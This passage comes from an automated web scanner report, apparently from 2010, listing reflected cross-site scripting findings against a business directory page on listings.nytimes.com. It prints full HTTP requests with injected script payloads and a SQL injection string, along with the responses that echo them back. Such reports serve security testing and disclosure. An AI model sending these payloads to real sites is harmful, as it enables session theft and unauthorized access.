26%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91513
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds1" value="80-N1010223,80-N1010192,80-N1011111,80-N1011051,80-N1010272,80-N1011071,80-N1009282,80-N1010211,80-N1011121,80-N100924272c71"><script>alert(1)</script>2698f5057612cf869">
...[SNIP]...

4.250. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28dfe"><script>alert(1)</script>aeb4c6c10408b07dc was submitted in the sLsIds2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-45187928dfe"><script>alert(1)</script>aeb4c6c10408b07dc&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91514
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCRTTDT=MJDHDNGAALNNPFCADMNEIGOD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds2" value="80-N1010218,20-1000297132_020,125-454145,125-500168,125-561603,125-557500,125-505633,125-502057,125-569378,125-45187928dfe"><script>alert(1)</script>aeb4c6c10408b07dc">
...[SNIP]...

4.251. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds2 request parameter is copied into the HTML document as plain text between tags. The payload e6b29<script>alert(1)</script>06fbf5e0638 was submitted in the sLsIds2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879e6b29<script>alert(1)</script>06fbf5e0638&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:25:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
1%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879e6b29<script>alert(1)</script>06fbf5e0638&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-
...[SNIP]...

4.252. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds3 request parameter is copied into the HTML document as plain text between tags. The payload 72b74<script>alert(1)</script>a9c03f8636f was submitted in the sLsIds3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-47150072b74<script>alert(1)</script>a9c03f8636f&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:25:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-47150072b74<script>alert(1)</script>a9c03f8636f&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-
...[SNIP]...

4.253. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bfe0"><script>alert(1)</script>2f05ec176569af554 was submitted in the sLsIds3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-4715009bfe0"><script>alert(1)</script>2f05ec176569af554&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=